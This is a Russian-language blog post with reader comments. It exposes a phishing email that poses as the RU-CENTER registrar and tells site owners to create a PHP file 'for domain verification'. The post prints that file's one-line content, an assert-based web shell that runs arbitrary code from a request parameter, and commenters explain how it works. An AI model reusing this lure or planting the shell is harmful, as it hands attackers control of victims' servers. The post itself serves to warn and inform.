Развод как он есть (или «подтверждение подтверждению рознь!»)

    Давно мне не попадалось такого красивого социального развода на действие (см. под катом). На фоне истории с блокировками и вообще затягивания гаек тем более приятно видеть, что кто-то сумел суровым тоном такое написать — ведь отдельные граждане и поведутся!

    image

    Мне думается, shared хостингам пора начинать фильтровать передаваемые в скрипты переменные, хотя имя переменной, уверен, в каждом случае разное.

    Получил в ящике, заведенном для административных целей, письмо якобы от имени RU-CENTER, со следующим текстом:

    Уважаемый клиент!

    В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.

    Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл kk4tamko17q83015.php со следующим содержимым:

    <?php
    assert(stripslashes($_REQUEST[JJIZS]));
    ?>
    

    Файл должен быть создан в течение трех календарных дней с момента получения настоящего сообщения и присутствовать на сервере до 30 апреля 2018 года, 07:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.

    Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, обслуживание домена будет завершено.
    Письмо красиво оформлено в классическом стиле письмо и сайта nic.ru, так что внешне все выглядит весьма прилично.

    По-моему, просто прекрасная акция с использованием социальной инженерии!

    Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.

    Сработает ли такая атака?
    Поделиться публикацией
    Комментарии 33
      +2
      А если у меня сайт на бэйсике написан, что тогда делать?
        +3
        А какая разница на чем сайт? Будет запрос на определенный файл, большинство хостингов исполнение php-скриптов поддерживают.

        P.S. большинство хостингов, которыми пользуются те, на кого развод подействует.
          0
          ну наверное «хакер» перед отправкой проверит возможность исполнения пэхэпэ)
          Хотя судя по содержимому скрипта который нужно создать… похоже на «хакеров» из вк которые отправляют «вирус» для подмены доменов в hosts файле…
            +1
            А что не так с содержимым скрипта?
              +3

              Я не настоящий сварщик пхп-кодер, но похоже, что там тупо выполняется скрипт переданный как параметр в запросе. Т.е. это готовый шелл.

                +1
                Ну да, так и есть…
          +1
          «Вы должны подтвердить, что управление доменным именем domain.ru осуществляется лицом, указанным в качестве его администратора.»
          И как размещение файлика может в принципе подтвердить, что управление доменом осуществляется Ивановым Иваном Ивановичем, а не Петровым Петром Петровичем?
          Я не знаю, как на такое можно повестись.
            +1
            ну, например, у яндеков с гуглов есть такое же подтверждение(создание файла) что это твой домен
              +2
              Не путайте. «яндексы и гуглы» проверяют, что к ним («яндексам и гуглам») обращается человек, имеющий права на управления доменом.
              Тот ли это человек, который указан в качестве администратора, или совсем другой, «яндексов и гуглов» не волнует.
          +1
          Эм… Простите за мой французский, но это же лютый боян и даже сам RU-CENTER рассылал письма-предупреждения, что есть такой развод и не ведитесь на него.
            +1
            Пфф, каждое утро в почте вижу попытки развода — то квитанции
            Типа
            Thank you.
            You've made a purchase from Battle Bay on App Store.

            Order number: APP.7419-9040-3156-01951
            Order date: April 17, 2018 01:47:50 AM EDT
            Item Price
            Mug Of Pearls — Get resources, skip waiting with 1,200 pearls US$10.99
            Total: US$10.99
            (Includes TAX of US$0.99)
            Payment method:
            iPay
            It's not you? Cancel Payment


            То письма от Netflix «Бла, бла, бла, что-то пошло не так, мы приостановили действие вашего аккаунта, обновите платёжные реквизиты». Ага, щаз. Только сначала зарегистрируюсь на Нетфликсе.
            Обострение весеннее, похоже. Давно таких откровенных попыток развода не видел
              0
              Везет вам! Или антиспам не работает?
                0
                Работает, но иногда проскакивают такие послания. С начала апреля примерно начались.
                0

                первое похоже на валидный чек, просто не ваш =)

                  0
                  Угу, очень похоже. Когда это мне первый раз пришло, я аж напрягся и чуть не полез в онлайн-банк последние операции смотреть. Потом пригляделся внимательнее, увидел внизу «It's not you? Cancel Payment» — сходите по ссылочке и отмените платёж, выдохнул и продолжил читать Хабр. Приходит эта дрянь теперь пару раз в неделю.
                  +1

                  Для тех кто не в теме, не мешало бы в статье дать краткие пояснения, что делает этот код. Понятно, что злоумышленник потом впишет путь к этому файлу на сайте в браузер, но вот что он увидит?

                    0
                    Да прям на хабре почитайте, что это и зачем.
                    habrahabr.ru/post/138443
                      0
                      assert в PHP работает как eval — исполняет произвольный код если ему передать строку. Если кто-то последует этому совету — злоумышленник получит универсальный бэкдор.
                      +1

                      Да это старая как мир разводка. Текст писем меняется, переменные меняются, бывает что код скрипта немного меняют(в одной версии заюзан base64(а иногда и gzip), в другой нет, в одной eval, в другой assert и т.п.) — но суть всех этих разводок и логика работы скрипта всегда одна и та же. Верояно, это какие-то скрипт-кидди уже не один год так развлекаются. Странно, что люди до сих пор ведутся на этот трюк и сами добавляют бэкдорчик на свой сайт. Социнжиниринг — это сила.

                        0

                        Согласен. Но в этом случае был поражен наглостью. И ведь ничего им не предъявишь на этом этапе: тебе прислали код, ты его сам выложил. Они станут редисками, когда через этот код заставят твой сервер что-не то делать, но и то — юридически тебя просто ввели в заблуждение, но пустил-то ты их сам!

                          0

                          Верно, на удивление нахраписто действуют парни. И предъявить им что-то не просто, как правило они код дёргают не напрямую со своего хоста, а через цепочку проксиков(подозреваю, что это поломанные ими VPS-ки вполне добропорядочных граждан). Что-бы таких товарищей отловить, нужно целую спец-операцию произвести с участием правоохранительных органов, хостеров на чьих серваках крутятся вломанные услуги заюзанные для проксирования и пострадавшими лицами, получившими подобные письма. Времени и сил это потребует немало, а на выходе будут пойманы нескольк скрипт-кидди. IMHO, но с точки зрения правоохранительных органов овчинка выделки не стоит.

                        0
                        Баянище. Если есть настроение, можно по логам посмотреть откуда дергается проверка и что передают(спойлер — первый запрос безобидный). Можешь абуз хостеру отправить(не забудь приложить текст письма и логи). Реагируют адекватно.
                        ЗЫ Автор не видел реально красивых разодов.
                          0
                          Готов поверить, что не видел. Не везло — или всё же везло?

                          А можно попросить рассказать?
                          0
                          Я бы повёлся, если просили разместить html документ. Хотя, скорее всего, сперва бы написал в техподдержку хостера.
                          А вот php файл не стал бы добавлять точно.
                            0
                            А если бы РКН «попросил» разместить, но именно подобный файл PHP?
                              0
                              «Ключи шифрования — это, в первую очередь, желание соблюсти закон...» и т.д.
                              У меня хостинг в России, поэтому у меня просто не будет выбора. И, придётся переносить хостинг.)
                                0
                                А как же «не сдает ключи тот, кому нечего скрывать»? Шутка.

                                Я смотрю, сейчас отличная тема для части контор уйти за границу, а для части — придти в Россию с Амазона.
                                  0
                                  У меня «уникальная» ситуация, которую не касается Я-пакет. Ни регистрации пользователей, ни чатов, ни прочего. Я вообще мог бы обойтись страничкой в ВК (она итак есть) или лэндингом в какой-нибудь бесплатной народной помойке. Даже от https отказался из-за отсутствия необходимости. Так что, конкретно в моём случае, когда нет ни коммерческой тайны, ни данных пользователей, ни паролей, ни прочего, я совершенно спокойно дам доступ любым правоохранительным структурам, если попросят. Потому что мне нечего скрывать от слова «вообще». В любой другой ситуации — однозначный перенос хостинга на неподконтрольные сервера. Возможно и перенос домена из зоны ru.
                            0
                            Можно выложить файл с таким именем, но только код поменять и вывести:
                            <? echo "Ваш айпи адрес ".$_SERVER['REMOTE_ADDR']." был записан. Ваша попытка атаки зарегистрирована. Направили заявление в правохранительные органы для уточнения вашей личности. Ждите наряд и не покидайте место преступления"; ?>

                            Учитывая уровень «хакерской атаки» можно заставить поволноваться уже «хакеров».
                              +2
                              Думаете, они глазами ответ сервера читают? Просто три дня сканят по кругу все домены, кому послали письмо, где есть ответ, там проверка, что шел «пошёл», и передача хоста для дальнейшей эксплуатации шела на следующий шаг.

                              Хозяин робота при этом сидит на Канарах в школе и ответов вашего сервера точно не читает. *смайлик*
                                0
                                Это как вариант, а может робот просто собирает места где шелл прошёл и потом злоумышленник уже делает что хочет в ручную. В любом случае тут и трудозатраты небольшие.

                            Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                            Самое читаемое